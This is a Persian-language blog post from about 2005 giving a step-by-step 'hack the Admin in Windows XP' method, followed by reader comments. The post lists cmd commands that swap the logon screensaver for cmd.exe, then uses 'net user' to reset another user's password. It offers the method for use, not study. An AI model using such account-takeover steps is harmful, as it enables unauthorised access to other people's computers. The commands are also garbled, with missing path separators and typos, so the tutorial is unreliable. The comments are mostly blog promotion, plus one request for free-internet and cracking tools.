سلام به همه دوستان خوبم.....

این هم چیزی که خیلی از شما منتظر ان بودید.هک کردن Adminدر ویندوز XPبرای این کار به منوی Runبروید.فرمان CMDرا تایپ و اینتر کنید.در پنجره باز شده این فرمان را بدون عیب و نقص اجرا کنید:

cd

cd windowssystem32

mkdir hackpass

copy logon.scr kackpasslogon.scr

copy cmd .exe hackpasscmd.exe

del logon.scr

rename cmd.exe logon.scr

exit

با این کار در حقیقتDOS promptرا بجایScreen Saverبه ویندوز معرفی می کنیدو این کار ویندوز را نا پایدار می کند.فقط توصیه می شود دستورهای delوrenameخیلی سریع انجام شوند این دو خط دستور را باید در عرض کمتر از دو ثانیه انجام دهید تا فایل های مورد نظر توسط ویندوز جایگزین نشوند (می توان کل پروسه را در یک فایل batقرار داد)اکنون کامپیوتر را Restartنمایید.Screen Saver را فعال نماییدتا منتظر بمانید تا خود به خوداجرا شود.خواهید دید که به جای screen saver خط فرمان DOS‌ظاهر می شود اکنون مثلا اگر User nameان massoudبود وخواستید پسورد ان را به Riyahiتغییر دهید این فرمان را در DOS promptانجام دهید.

net user massoud riyahi

به این ترتیب پسورد به riyahiتغییر خواهد یافت.

نکته:حتما بعد از پایان کار دو فایلی را که در پوشهhackpassکپی کردید به جای اول بر گردانید.

امیدوارم مفید بوده باشه .....

نظر هم یادتون نره

نظرات 6 + ارسال نظر
ترانه های عاشقانه شنبه 20 فروردین‌ماه سال 1384 ساعت 12:29 ب.ظ http://cityoflove.blogsky.com

با سلام وبلاگ جالبی داری به من هم سر بزن البته وبلاگ من ظاهرا فیلتر شده ولی درباره دور زدن فیلتر یک نرم افزار معرفی کردم که خیلی توپه بای

مهدی شنبه 20 فروردین‌ماه سال 1384 ساعت 12:47 ب.ظ http://varzeshp.blogsky.com

سلام من مهدی هستم . بیا معرفت به دیدن وبلاگ من بده .در وبلاک من عکس هر بازیکنی که بخواهی وجود دارد . اگر نبود به من بگو من برات جور میکنم .
بیا ودیدن کن ظرر نمی کنی .
اومدی نظر بدی ممنون میشم .
بای؟؟؟؟؟؟؟

مسعود یکشنبه 21 فروردین‌ماه سال 1384 ساعت 01:44 ق.ظ http://www.massoudx12.blohsky.com

سلام محمد جان

بابا ایول خیییییییییییلی توپ بود

ما منتظر مطالب جدبد تر هستیم

مــــــــــــــــــــــــــــــعـــــــــــــــــــــــــــود

مهدی یکشنبه 21 فروردین‌ماه سال 1384 ساعت 01:19 ب.ظ http://varzeshp.blogsky.com

از تو بسیار بسیار وخیلی خیلی ممنونم که به وب من امدی و دیدن کردی دیدی گفتم ظرر نمیکنی .
فقط همین یک بار نشه بازم سر بزن باشه .
تو هم وب خوبی داری خیلی عالیه مگه نه؟؟؟؟؟؟؟

کامیرا سه‌شنبه 23 فروردین‌ماه سال 1384 ساعت 11:23 ب.ظ http://bandarabbascity.blogsky.com

سلام. ممنون از نظر خوبتون. وبلاگ خوبی دارید. همه مطالبتون رو خوندم. باز هم اینجا میام. موفق باشید.

ramiyar جمعه 1 اردیبهشت‌ماه سال 1385 ساعت 11:12 ب.ظ

سلام وبلاگتون خیلی خیلی خیلی توپه
من میخوام یک روش توپ برای اینترنت که رایگان باشه
یااز کارتی که استفاده می کنم بینهایت بشه
iloveeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
man rashthi computer hastam barnamh noes
یک مجموعه نرم kinga of hack& cracK 2005
است که برا هک کردن است هچی در موردش نمی دونم
همچی توشه بوت بومبر ..................................؟
ریجستری اگه چیز موردی بهال داشتی منوووووو یادات نره
در این مورد ها اگه چیزی بالدی بااین idبرام بفرست
id man:ramiar joon 2005@yahoo.com
baram af bazar kosh hal misham
amid varam masl ona na bashi ka
nazar hae vab lago aslan nmikonan
ok
eadat narh af bazar
bay

برای نمایش آواتار خود در این وبلاگ در سایت Gravatar.com ثبت نام کنید. (راهنما)
ایمیل شما بعد از ثبت نمایش داده نخواهد شد